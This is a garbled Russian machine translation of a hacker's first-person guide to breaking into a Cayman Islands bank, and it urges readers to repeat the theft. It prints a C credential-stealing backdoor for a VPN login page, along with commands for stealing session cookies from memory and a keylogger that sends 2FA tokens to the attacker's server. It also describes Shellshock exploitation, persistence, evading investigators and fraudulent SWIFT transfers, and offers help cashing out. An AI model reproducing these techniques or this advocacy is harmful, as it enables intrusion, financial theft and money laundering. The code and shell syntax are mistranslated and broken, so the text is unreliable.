те, кто их монополизирует; и это, следовательно, следует уважать,
почитать, и даже за чем гоняться), открыть наши умы, учиться и
учиться у истории и вместе признавать эту незаконность ».
несколько книг, которые помогли мне в этом [7] [8] [9] [10] [11].
По словам Барака Обамы, экономическое неравенство является «определяющим вызовом для наших
время ". Взлом компьютеров - мощное средство борьбы с
экономическое неравенство. Бывший директор АНБ Кейт Александер соглашается
и говорит, что хакерство несет ответственность за «самый крупный перевод богатства из
сказка".
_________________________
/ История наша \
\ и хакеры это делают! /
-------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
За гранью настоящего, сейчас и всегда!
[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2] https://chomsky.info/commongood02/
[3] Воля к изменениям: мужчины, мужественность и любовь
[4] его собственная религия уже очень ясно говорит об этом:
https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6] http://www.hamptoninstitution.org/exppriation-or-bust.html
[7] Манифест демократической цивилизации. Том 1, Цивилизация: Эпоха
богов в масках и покрытых королей
[8] Калибен и ведьма
[9] В долгу: альтернативная история экономики
[10] Другая история США
[11] Открытые вены Латинской Америки
_________________________________
<Наше оружие - наша клавиатура>
---------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
'' ^^ ^^
- [2 - Введение] ------------------------------------------- - --------------
Это руководство объясняет, как я взломал Cayman Bank and Trust Company.
(Остров Мэн). Почему я публикую это почти четыре года спустя?
1) Показать, что возможно
Хакеры, работающие над социальными изменениями, ограничились разработкой
инструменты безопасности и конфиденциальности, DDoS, выполняют дефейсы и утечки.
Куда бы вы ни пошли, вас ждут радикальные проекты по полному изменению общества.
шаткое состояние, и они могли бы многое сделать с небольшими деньгами
экспроприирован. По крайней мере, для рабочего класса ограбление банка - это что-то
социально приемлемые, а тех, кто это делает, считают народными героями. На
В эпоху цифровых технологий ограбление банка - это ненасильственный акт, менее рискованный, и
награда больше, чем когда-либо. Так почему только хакеры из
черную шляпу, которую они делают для своей личной выгоды, и никогда
хактивистов для финансирования радикальных проектов? Может они так не думают
в состоянии это сделать. О взломах крупных банков сообщают в новостях каждые
а также взлом Бангладешского банка [1], приписываемый Корее
Norte, или взломы банков, приписываемые группе Carbanak [2], которую они описывают
как очень большая и хорошо организованная группа русских хакеров, с разными
члены, которые будут специализироваться на различных задачах. И, ну это не так
сложный.
Это из-за нашего коллективного убеждения, что финансовая система не подлежит сомнению.
что мы контролируем себя и поддерживаем систему классов
без каких-либо действий со стороны вышеперечисленных [3]. Чтобы увидеть, насколько уязвимы и
на самом деле хрупкая финансовая система помогает нам избавиться от этой галлюцинации
коллектив. Вот почему у банков есть сильный стимул не отчитываться.
взлома и преувеличить, насколько изощренны злоумышленники. Ни один из
О финансовых взломах, которые я совершал или о которых я знал, никогда не сообщалось.
Это будет первое, и не потому, что банк хотел, а потому, что я
Решил опубликовать.
Как вы скоро узнаете из этого домашнего руководства, взломайте банк и
перевод денег через сеть SWIFT не требует поддержки каких-либо
правительство или большая специализированная группа. Это вполне возможно
будучи простым любителем и хакером, работающим только с инструментами
аудитории и базовые знания о том, как писать сценарий.
[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
[3] https://es.wikipedia.org/wiki/Hegemonía_cultural
2) Помогите снять наличные
Многие из тех, кто это прочитает, уже имеют или после небольшого изучения будут
в состоянии приобрести навыки, необходимые для выполнения взлома
как это. Однако многие обнаружат, что им не хватает
криминальные связи, необходимые для приведения ручек в хорошее состояние. В себе
Во всяком случае, это был первый взломанный банк, и на тот момент у него было всего несколько
немногочисленные и посредственные счета, готовые для снятия наличных (известные
как банк падает), так что всего несколько сотен тысяч
Я смог полностью вывести деньги, когда обычно снимаются миллионы. Теперь вместо этого да
что у меня есть знания и связи, чтобы получать деньги более серьезно, от
поэтому, если они обнаружат, что взламывают банк, но им нужна помощь в конвертации
реальными деньгами, и они хотят использовать эту шерсть для финансирования проектов.
радикальный социальный, свяжитесь со мной.
3) Сотрудничайте
Можно взламывать банки, как индивидуальный любитель, но
Суть в том, что, в общем, это не так просто, как я это здесь изображаю. Мне повезло с
этот банк по нескольким причинам:
1) Это был небольшой банк, поэтому мне потребовалось гораздо меньше времени, чтобы добраться до
понимаю, как все работало.
2) У них не было процедуры проверки отправленных быстрых сообщений.
Он есть во многих банках, и вам нужно написать код, чтобы скрыть свои
переводы из вашей системы мониторинга.
3) Они использовали только аутентификацию по паролю для доступа к приложению с
которые были подключены к сети SWIFT. Большинство банков сейчас используют RSA
SecurID или некоторая форма 2FA. Вы можете пропустить это, набрав код для
получать предупреждение, когда ваш токен входит, чтобы вы могли использовать его раньше
истекает. Это проще, чем кажется: я использовал Get-Keystrokes [1],
модифицируя его так, чтобы вместо сохранения нажатых клавиш
GET-запрос к моему серверу каждый раз, когда обнаруживается, что они вошли в
Имя пользователя. Этот запрос добавляет имя пользователя к URL-адресу и,
по мере ввода токена выполняется несколько GET с цифрами токена.
присоединен к URL-адресу. Со своей стороны, я пока оставляю это включенным:
ssh мне @ my_secret_server 'хвост -f / var / log / apache2 / access_log'
| пока читал я; do echo $ i; aplay alarm.wav &> / dev / null; Выполнено
Если это веб-приложение, вы можете пропустить двухфакторную аутентификацию, украв файл cookie.
после аутентификации. Я не APT с командой программистов
что они могут делать мне специальные инструменты. Я простой человек живущий
из того, что дает вам терминал [2], поэтому я использую:
procdump64 / acceptpteula -r -ma PID_del_browser
strings64 / acceptpteula * .dmp | findstr PHPSESSID 2> нуль
или передав его через findstr, а не через строки, что делает его гораздо более
быстрый:
findstr PHPSESSID * .dmp> tmp
strings64 / acceptpteula tmp | findstr PHPSESSID 2> нуль
Другой способ пропустить его - получить доступ к сеансу со скрытым VNC (hvnc).
после аутентификации или с небольшим творчеством
вы могли бы сосредоточиться на другой части их процесса вместо отправки сообщений
SWIFT напрямую.
Я думаю, если бы он сотрудничал с другими опытными банковскими хакерами, мы могли бы
сделать нас сотнями банков, таких как Карнабак, вместо того, чтобы делать один из многих
в том числе самостоятельно. Так что, если у вас есть опыт использования подобных хаков и
вы хотите сотрудничать, свяжитесь со мной. Вы найдете мою электронную почту и мой ключ PGP в конце
предыдущее руководство [3].
[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
Exfiltration / Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41914
________________________________________
/ Если ограбление банка изменило ситуацию, \
\ сделает это незаконным /
----------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [3 - Будьте осторожны] ---------------------------------------- - -----
Важно соблюдать некоторые простые меры предосторожности. Я буду ссылаться на это
тот же раздел моего последнего руководства [1], так как, по-видимому, он хорошо работает, просто
[два]. Все, что я должен добавить, это то, что, по словам Трампа, «Если только
поймать хакеров с поличным, сложно определить, кто есть что
выполнял взлом ", так что полиция получает все больше и больше
творческий [3] [4] в ее попытках поймать преступников с поличным (когда
ваши зашифрованные жесткие диски разблокированы). Так что было бы неплохо, если бы
Например, вы носите с собой определенное устройство Bluetooth и настраиваете
компьютер выключаться, когда вы выходите за пределы определенного диапазона, или
когда акселерометр обнаруживает движение или что-то в этом роде.
Вы можете писать длинные статьи, подробно описывающие ваши действия, а не вашу идеологию.
быть самым безопасным в мире (ой!), но иногда мне кажется, что я должен
сделай это.
Если бы я не верил в то, кто меня слушает
Если бы я не верил в то, что болит
Если бы я не верил в то, что осталось
Если бы я не верил в то, с чем сражаюсь
Что за вещь ...
Какой была бы булава без каменоломни?
[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
phineas-fisher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
Alphabay-арест-видео
, - \ __
| f- "Y \ ____________________
\ () 7L / | Будь геем! |
cgD | Соверши преступление! | __ _
| \ (---------------------. 'Y'>,
\ \ \ / _ _ \
\\\ \) (_) (_) (|}
\\\ {4A} /
\\\ \ uLuJJ / \ l
\\\ | 3 п) /
\\\ ___ __________ / nnm_n //
c7 ___-__, __-) \, __) (". \ _> - <_ / D
// V \ _ "-._.__ G G_c __.-__ <" / (\
<"-._> __-, G _.___) \ \ 7 \
("-.__. | \" <.__.- ") \ \
| "-.__" \ | "-.__.-". \ \ \
("-.__" ". \" -.__.- ". | \ _ \
\ "-.__" "|! |" -.__.- ".) \ \
"-.__" "\ _ |" -.__.- "./ \ l
".__" ""> G> -.__.- "> .--, _
"" ГРАММ
Многие винят квир-людей в упадке этого общества;
мы гордимся этим
Некоторые считают, что мы хотим сгореть дотла
эта цивилизация и ее моральная ткань;
Они не могли быть более правильными
Нас часто описывают как развратных, упадочных и непослушных.
Но ох! Они еще ничего не видели
Be Gay Do Crime
Mary Nardini Gang Be Gay Do Crime An Introduction 2019 Elements of this introduction were presented at the North American Anarchist Studies Network...
theanarchistlibrary.org
- [4 - Получить доступ] ------------------------------------------ - -----------
В другом месте [1] я рассказывал им об основных способах получения
первоначальный доступ к сети компании во время целевой атаки. Тем не мение,
Это не была целенаправленная атака. Я не собирался взламывать конкретный банк,
он хотел взломать любой банк, что в конечном итоге оказалось утомительной работой
проще. Этот тип неспецифического подхода был популяризирован Lulzsec и
Анонимный [2]. В рамках [1] я подготовил эксплойт и несколько инструментов для
пост-эксплойт для популярного VPN-устройства. Затем я начал сканировать
весь Интернет с помощью zmap [3] и zgrab для идентификации других устройств
уязвимый. Я попросил сканер сохранить уязвимые IP-адреса вместе с
"общее имя" и "альтернативные имена" SSL-сертификата устройства, имена
windows домена устройства и обратный поиск IP-адреса в DNS. Ты
Я выполнил поиск с помощью команды grep, ища слово «банк», и этого оказалось достаточно для
выбрать, но правда в том, что слово "Кайман" меня привлекло, и вот так я пришел
чтобы сохранить это.
[1] https://www.exploit-db.com/papers/41914
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https://github.com/zmap/zmap
---- [4.1 - Эксплойт] ---------------------------------------- ----------------
Когда я опубликовал свое последнее руководство «Сделай сам» [1], я не раскрыл подробностей использования
sonicwall, который он использовал для взлома Hacking Team, поскольку он был очень полезен для
другие хаки, вроде этого, и я еще не закончил с ними развлечься.
Решив взломать Hacking Team, я потратил недели на разработку
обратный к его модели ssl-vpn от sonicwall, и даже удалось найти
различные уязвимости, связанные с повреждением памяти, более или менее сложно
взорваться, прежде чем я понял, что устройство легко использовать
с шелушением [2]. Когда вышел Shellshock, многие устройства sonicwall были
уязвим, просто с запросом к cgi-bin / welcome и полезной нагрузкой в
пользовательский агент. Dell выпустила обновление безопасности и рекомендации для этих
версии. Версия, используемая Hacking Team и этим банком, имела версию
bash уязвим, но запросы cgi не запускали шеллшок, за исключением
запросы к сценарию оболочки, и был доступен только один:
cgi-bin / jarrewrite.sh. Похоже, это ускользнуло от людей из Dell в их записке:
поскольку они никогда не выпускали обновления безопасности или рекомендации по этому поводу
версия sonicwall. И любезно, Dell сделал два root-идентификатора unix setuid,
оставляя устройство легко рутировать.
В моем последнем руководстве многие читали, что я провел недели, исследуя устройство.
пока они не придумали эксплойт, и они решили, что это означает, что я какой-то парень
хакерская элита. Реальность, то есть тот факт, что мне потребовалось две недели
понимаете, что это было тривиально эксплуатировать с Shellshock, может быть, меньше
мне лестно, но я думаю, что это также более вдохновляет. Покажи это
Вы действительно можете сделать это сами. Тебе не нужно быть гением, я
Конечно, нет. На самом деле моя работа против Hacking Team начала
годом ранее. Когда я обнаружил Hacking Team и Gamma Group в
Исследование CitizenLab [3] [4], я решил немного изучить и посмотреть, смогу ли я
найти что-то. Я ничего не добился с Hacking Team, но мне повезло с
Gamma Group, и мне удалось взломать их портал поддержки клиентов с помощью sql-инъекции.
базовые уязвимости и уязвимости загрузки файлов [5] [6]. Однако, несмотря на
что их сервер поддержки дал мне поворот к внутренней сети Gamma
Group мне не удалось проникнуть дальше в компанию. начиная с этого
опыт работы с Gamma Group и другими хакерами, я понял, что я
действительно ограничен моим незнанием о повышении привилегий и
боковое перемещение в окнах доменов, активном каталоге и окнах в целом.
Так что я учился и практиковался (см. Раздел 11), пока не почувствовал, что готов
чтобы снова нанести визит Hacking Team почти год спустя. Упражняться
окупился, и на этот раз я смог полностью взять на себя обязательство
компания [7]. Прежде чем я понял, что могу заняться шелушением, я был
готовы провести целые месяцы счастливой жизни, изучая развитие
эксплойтов и написания доверенного эксплойта для одной из уязвимостей
повреждение памяти, которое он обнаружил. Я знал только эту хакерскую команду
должны быть разоблачены, и это займет столько времени, сколько необходимо, и
он узнает то, чему он должен научиться, чтобы получить это. Для выполнения этих
хаки не обязательно должны быть блестящими. Вам даже не нужны большие знания
техник. Вам просто нужна целеустремленность и вера в себя.
[1] https://www.exploit-db.com/papers/41914
[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3] https://citizenlab.ca/tag/hacking-team/
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
Бахрейн-трек-арабские-весенние протестующие /
[6] https://www.exploit-db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
---- [4.2 - Бэкдор] ---------------------------------------- ---------------
Частью бэкдора, который я подготовил для Hacking Team (см. [1], раздел 6), был
Простая оболочка на странице входа в систему для сбора паролей:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
{
char buf [2048];
int nread, pfile;
/ * вытаскивает журнал, если мы отправляем специальный файл cookie * /
char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "наш личный пароль")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
в то время как ((nread = read (pfile, buf, sizeof (buf)))> 0)
написать (1, buf, nread);
выход (0);
}
/ * принципал сохраняет данные POST и отправляет их потомку,
это настоящая программа входа в систему * /
int fd [2];
труба (фд);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
закрыть (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
написать (fd [1], buf, nread);
написать (pfile, buf, nread);
}
написать (pfile, "\ n", 1);
закрыть (fd [1]);
закрыть (pfile);
ждать (NULL);
} еще {
закрыть (fd [1]);
dup2 (fd [0], 0);
закрыть (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
}
}
В случае с Hacking Team они вошли в VPN с одноразовыми паролями,
так что VPN дал мне доступ только к сети, и оттуда я взял
дополнительные усилия, чтобы получить администратора домена в вашей сети. В другом руководстве я написал
о побочных проходах и повышении привилегий в доменах Windows [1]. В этом
Однако в данном случае использовались те же пароли домена Windows.
используется для аутентификации по VPN, поэтому я смог получить много
пароли пользователей, включая пароли администраторов домена. Теперь у меня было всего
доступ к вашей сети, но обычно это самая простая часть. Самая тяжелая часть
это понять, как они работают и как получить пистолет.
[1] https://www.exploit-db.com/papers/41914
---- [4.3 - Интересные факты] ---------------------------------------- ------------
После расследования взлома я нашел его интересным.
видите, что примерно в то же время, что и я, банк, возможно, был
взломано кем-то другим через целевое фишинговое письмо [1].
Как говорится в старой поговорке: «Дайте человеку эксплойт, и он получит доступ к
день, научите его фишеру, и он будет иметь к нему доступ всю свою жизнь »[2].
кто-то другой случайно и одновременно со мной поставил эту скамейку
маленькая цель (зарегистрировали домен, аналогичный реальному домену банка
чтобы иметь возможность отправлять фишинг оттуда) предполагает, что взлом банка
они встречаются гораздо чаще, чем известно.
Забавное предложение, чтобы вы могли следить за исследованиями вашего
взлом - это резервный доступ, который вы не коснетесь, если не
теряют нормальный доступ. У меня есть простой скрипт, который ожидает от команд
один раз в день или реже, чтобы поддерживать долгосрочный доступ в случае
которые блокируют мой обычный доступ. Потом у меня была империя PowerShell [3]
звонил домой чаще с другого IP-адреса и использовал empire для
запустить meterpreter [4] против третьего IP-адреса, где он выполнял большую часть
моя работа. Когда PWC начала расследование взлома, они обнаружили, что я использую
empire и meterpreter, очистили эти компьютеры и заблокировали эти IP-адреса, но
они не обнаружили моего резервного доступа. PWC разместила
мониторинг сети, чтобы иметь возможность анализировать трафик и видеть, есть ли еще
зараженные компьютеры, поэтому я не хотел сильно подключаться к их сети. Только
Я запустил mimikatz один раз, чтобы получить новые пароли, и оттуда
Я смог продолжить его исследование, прочитав его электронные письма в веб-сайте Outlook.
[1] стр. 47, Project Pallid Nutmeg.pdf, торрент
[2] [3] https://github.com/EmpireProject/Empire
[4] https://github.com/rapid7/metasploit-framework
- [5 - Общие сведения о банковских операциях] ------------------------------------
Чтобы понять, как работает банк и как в нем могут быть деньги, я проследил
методы, которые я обобщил в [1], в разделе «13.3 - Внутреннее распознавание».
Я загрузил список всех имен файлов, я выполнил поисковый запрос
слов типа «SWIFT» и «перевод», и я скачал и прочитал все
файлы с интересными названиями. Я также искал электронные письма сотрудников, но из
Безусловно, наиболее полезной техникой было использование клавиатурных шпионов и снимков экрана для
понаблюдайте за тем, как работали сотрудники банка. Я не знал этого в то время, но
для этого Windows предлагает очень хороший инструмент мониторинга [2]. Откуда я знаю
описана в технике № 5 раздела 13.3 в [1], я сделал снимок экрана
нажатия клавиш в домене (включая заголовки окон), я сделал
grep ищет SWIFT и обнаружил, что некоторые сотрудники открывают SWIFT Access
Сервисное бюро - Вход в систему. Для этих сотрудников я запустил meterpreter, как в [3], и
Я использовал модуль post / windows / gather / screen_spy, чтобы делать скриншоты
каждые 5 секунд, чтобы увидеть, как они работают. Они использовали приложение
удаленный Citrix из нижней линии компании [4] для доступа к сети SWIFT, где
Каждое платежное сообщение SWIFT MT103 должно было пройти через трех сотрудников: одного
для «создания» сообщения, один для «проверки» его, а другой для «авторизации». Какие
У него уже были все свои учетные данные благодаря кейлоггеру, я смог справиться с
облегчить себе три шага. И из того, что я знал, увидев их
работают, они не просматривали отправленные сообщения SWIFT, поэтому вы должны иметь
достаточно времени, чтобы получить деньги из моего банка, выпадет до банка
заметил и попробовал поменять передачи.
[1] https://www.exploit-db.com/papers/41914
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
удаленно-с-metasploit /
[3] https://www.trustedsec.com/blog/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
_________________________________________
/ Кто грабит вора, ему сто лет \
\ прощения. /
-----------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [6 - Отправьте деньги] ----------------------------------------- - ------------
Я не имел большого представления о том, что делаю, поэтому я узнал
Кстати. Как-то пошли первые отправленные мной переводы
хорошо. На следующий день я облажался, отправив перевод в Мексику, который поставил
конец моему веселью. Этот банк отправлял ваши международные переводы
через ваш корреспондентский счет в Natwest. Я видел, что учетная запись
Корреспондент переводов в фунтах стерлингов был указан как
NWBKGB2LGPL, а для остальных - NWBKGB2LXXX. Перенос
Мексиканский был в фунтах стерлингов, поэтому я решил, что мне нужно указать NWBKGB2LGPL как
корреспондент. Если бы я подготовил его лучше, я бы знал, что LPG вместо
XXX заявил, что платеж будет отправлен через службу быстрых платежей
Великобритания, а не как международный трансфер, что, очевидно,
Что ж, это не сработает, когда вы попытаетесь отправить деньги в Мексику. Так
банк получил сообщение об ошибке. В тот же день я также попытался отправить
платеж в размере 200 тыс. фунтов стерлингов в Великобританию с использованием NWBKGB2LGPL, который не был произведен, потому что 200 тыс. превысили
ограничение доставки с использованием быстрых платежей, и пришлось бы использовать NWBKGB2LXXX в
время. Они также получили сообщение об ошибке. Они читают сообщения,
Они исследовали и нашли остальные мои переводы.
- [7 - Кнопка] ------------------------------------------ - -------------------
Из того, что я пишу, вы получите полное представление о моих идеалах.
какие вещи я поддерживаю вас. Но я не хочу видеть никого в затруднительном положении
для получения экспроприированных средств, поэтому больше ни слова о том, где они
это была шерсть. Я знаю, что журналисты, вероятно, захотят поставить несколько
число того, сколько долларов было распределено в этом хаке и других
похоже, но я предпочитаю не поощрять нашу извращенную привычку измерять
акции только из-за их экономической ценности. Любое действие достойно восхищения, если оно таково.
Это происходит от любви, а не от эго. К сожалению, верхушка, богатые и
влиятельные, общественные деятели, бизнесмены, люди на должностях
«важные», те, которые наше общество уважает и ценит больше всего, те, которые
помещены туда, где они основаны больше на эго, чем на любви. В
простые, скромные и «невидимые» люди, на которых мы уже должны смотреть
кем мы должны восхищаться.
- [8 - Криптовалюты] ------------------------------------------- - -------------
Перераспределить экспроприированные деньги на чилийские проекты, направленные на социальные изменения
Положительно, было бы проще и безопаснее, если бы эти проекты принимали пожертвования
анонимно через криптовалюты, такие как monero, zcash или, по крайней мере, биткойн. Это понятно
что многие из этих проектов не любят криптовалюты, поскольку
они больше похожи на какую-то странную гиперкапиталистическую антиутопию, чем на экономику
социальные, с которыми мы мечтаем. Я разделяю ваш скептицизм, но думаю, что они
Полезно для разрешения анонимных пожертвований и транзакций путем ограничения
государственный надзор и контроль. Так же, как наличные деньги, использование которых многие
страны пытаются ограничить по той же причине.
- [9 - Powershell] ------------------------------------------- - ----------------
В этой операции, как и в [1], я много использовал PowerShell. Для
тогда Powershell был супер крутым, вы могли делать все, что угодно,
вы хотели бы, без обнаружения антивирусов и с очень небольшим количеством криминалистических исследований. Такое случается
что с введением AMSI [2] наступательная Powershell уходит на пенсию.
Сегодня наступательный C # находится на подъеме с такими инструментами, как
[3] [4] [5] [6]. AMSI приходит в .NET с 4.8, поэтому инструменты в
C #, вероятно, останется еще пара лет до того, как они устареют.
И затем мы вернемся к использованию C или C ++, или, возможно, Delphi вернется к
мода. Конкретные инструменты и методы меняются каждые несколько лет, но в
суть не столько в том, что меняется, сегодня хакерство по сути все еще
То же, что и в 90-е. Собственно все скрипты powershell
использованные в этом руководстве и в предыдущем [1], все еще можно использовать
сегодня, после небольшого обфускации собственного урожая.
[1] https://www.exploit-db.com/papers/41914
[2] https://medium.com/@byte_St0rm/
приключения-в-чудесном-мире-амси-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
___________________________
/ Фо Состин, Фо Ордааг \
\ Финансовый сектор, к черту /
---------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [10 - Торрент] ------------------------------------------- - ------------------
Конфиденциальность для слабых, прозрачность для сильных.
Оффшорный банкинг обеспечивает конфиденциальность их собственного правительства для
руководители, политики и миллионеры. Разоблачение их может показаться
лицемерно по отношению ко мне, так как я в целом сторонник конфиденциальности и
против государственного надзора. Но закон уже был написан и
для богатых: защищает вашу систему эксплуатации с некоторыми ограничениями (например,
налоги), чтобы общество могло функционировать и система не рухнула под
тяжесть собственной жадности. Так что нет, конфиденциальность - это не то же самое для
мощный, когда он позволяет им выйти за пределы системы как таковой
предназначены для предоставления им привилегий; и уединение для слабых, кому
он защищает от системы, предназначенной для их использования.
Даже журналисты с самыми лучшими намерениями считают это невозможным
изучить такой огромный материал и знать, что получится
актуально для людей в разных частях света. Когда я отфильтровал
Взломав файлы команды, я передал The Intercept копии писем.
электронный за месяц вперед. Они нашли пару 0 дней, которые
Hacking Team использовала, они ранее сообщили о них в MS и Adobe и опубликовали
несколько историй после того, как утечка стала достоянием общественности. Нет смысла
по сравнению с огромным количеством статей и исследований, появившихся после
полная фильтрация для публики. Видя это так, а также учитывая (не)
редакционная публикация [1] панамских газет, я думаю, что
Публичная и полная фильтрация этого материала - правильный выбор.
[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
защитить-запад-1-от-панама-утечки /
Психологи обнаружили, что те, кто ниже по иерархии, склонны
понимать и сопереживать тем, кто наверху, но обратное меньше
общий. Это объясняет, почему в этом сексистском мире многие мужчины шутят о
его неспособность понимать женщин, как если бы это была загадка
неразрешимый. Объясните, почему богатые, если они задумаются о ком
они живут в бедности, они дают советы и «решения», столь чуждые
реальность, которая заставляет вас смеяться. Объясните, почему мы уважаем руководителей
как храбрые, которые рискуют. Чем они рискуют помимо своих
привилегия? Если все их предприятия потерпят неудачу, им придется жить и работать
как и все мы. Это также объясняет, почему многие будут обвинять
от безответственной и опасной течи без царапин. Почувствуйте
«опасность» для оффшорного банка и его клиентов намного сильнее, чем
какие несчастья обездоленных этой несправедливой системой и
неравный. И утечка их финансов опасна для них, или
так что только из-за своего положения на вершине иерархии он не должен даже
существовать?
, ------------------------------------------------- -.
_, -._ | Они очерняют нас, этих подлых; когда только |
; ___: | разница в том, что они грабят бедных |
, - '(..)' --.__ | защищены законом, бог знает, и мы |
_; ||| \ | грабим богатых под исключительной защитой |
'._, -----' ''; = .____, "| наше мужество. Вы не должны предпочитать быть |
/// <or> | ## | | один из нас, вместо того, чтобы попрошайничать перед ними |
(или \ `- '/ злодеи ищут работу? |
/// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
--._ >>>>>>>> <<<<<<<< /
___ () >>> [||||] <<<<
`- '>>>>>>>> <<<<<<<
>>>>>>> <<<<<<
>>>>> <<<<<
>> ctr <<
Капитан Беллами
- [11 - Научитесь взламывать] ----------------------------------------- - ----------
Вы плохо начинаете взламывать. Вы начинаете взламывать дерьмо, думая
что хорошо, а потом мало-помалу тебе станет лучше. Вот почему я всегда говорю
что одна из самых ценных добродетелей - настойчивость.
- Советы Октавии Батлер для соискателя APT
Лучший способ научиться взламывать - это взламывать. Создайте лабораторию с
виртуальных машин и начал тестирование, сделав перерыв, чтобы исследовать
все, чего вы не понимаете. По крайней мере, вам понадобится сервер Windows
в качестве контроллера домена к домену подключена еще одна обычная виртуальная машина Windows, и
машина разработки с Visual Studio для компиляции и модификации инструментов.
Попробуйте сделать офисный документ с макросами, запускающими meterpreter или другой
RAT и опробовал meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec и другие техники бокового прохода [1]; а также другие скрипты,
инструменты и методы, упомянутые в этом и предыдущем руководстве [2]. К
сначала можно отключить windows defender, а потом все попробовать
активировав его [3] [4] (но отключив автоматическую отправку образцов).
Как только вы освоитесь со всем этим, вы будете готовы взломать 99%
компании. Есть несколько вещей, которые в какой-то момент будут очень полезны в вашем
учимся, как удобно работать с bash и cmd.exe, доменом
базовый PowerShell, Python и javascript, знание Kerberos [5] [6]
и активный каталог [7] [8] [9] [10], а также свободное владение английским языком. Хорошая книга
вводный - "Пособие для хакеров".
Я также хочу немного написать о вещах, на которых не стоит сосредотачиваться, если вы этого не сделаете
вы хотите развлечься только потому, что кто-то сказал вам, что вы не хакер "
true ", если вы не знаете ассемблера. Очевидно, выучите все, что вас интересует,
но я пишу эти строки, думая о тех вещах, в которых вы можете
сосредоточьтесь на практических результатах, если взлом - это то, что вы ищете
компании фильтровать и экспроприировать. Базовые знания техники безопасности в
веб-приложения [11] полезны, но специализироваться на веб-безопасности - нет
действительно лучшее использование вашего времени, если вы не хотите сделать карьеру в
пентестинг или охота за ошибками. CTF и большинство
ресурсы, которые вы найдете при поиске информации о взломе, сосредоточьтесь
обычно в таких навыках, как веб-безопасность, реверс-инжиниринг, разработка
эксплойтов и др. Вещи, которые имеют смысл понимать их как способ
готовить людей к карьере в промышленности, но не к нашей
цели. Спецслужбы могут позволить себе иметь команду
посвященный самому продвинутому в фаззинге, команда, работающая над разработкой
эксплуатирует с увлечением, исследуя исключительно новые методы
манипуляции с насыпью и т. д. У нас нет ни времени, ни
ресурсы для этого. Два самых важных навыка для взлома на сегодняшний день
практическими являются фишинг [12] и социальная инженерия для получения доступа
начальный, а затем иметь возможность масштабировать и перемещаться по доменам Windows.
[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41914
[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
обнаружение-сигнатуры-антивируса и обход-это-
[5] https://www.tarlogic.com/en/blog/how-kerberos-works/
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
внешнее взаимодействие через целевой-фишинг /
- [12 - Рекомендуемая литература] ------------------------------------------ - -----
__________________________________________
/ Когда научный уровень мира \
| | намного превышает их уровень солидарности, |
\ Этот мир самоуничтожается. /
------------------------------------------
\ _. --- ._. .
* \. ' '. *
* _.- ~ =========== ~ -._
. (___________________). *
. ' \ _______ /. '
. ' . '
'
- Мне
Почти все взломы сегодня совершаются хакерами в черной шляпе, для их
личная выгода; или хакерами в белой шляпе, в интересах
акционеров (и в защиту банков, компаний и государств, которые
уничтожение нас и планеты, на которой мы живем); и военными и
разведывательные службы, как часть их повестки дня войны и конфликта. Смотреть
что этот наш мир уже на пределе, я подумал, что в дополнение к этим
технические советы, чтобы научиться взламывать, должны включать некоторые ресурсы, которые
были очень важны для моего развития и помогли мне использовать мои
взлом знаний.
* Ами: Дитя звезд - Энрике Барриос
* Анархия Работает
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
работает
* Жить своей жизнью - Эмма Гольдман
* Взлет и падение Джереми Хаммонда: враг государства
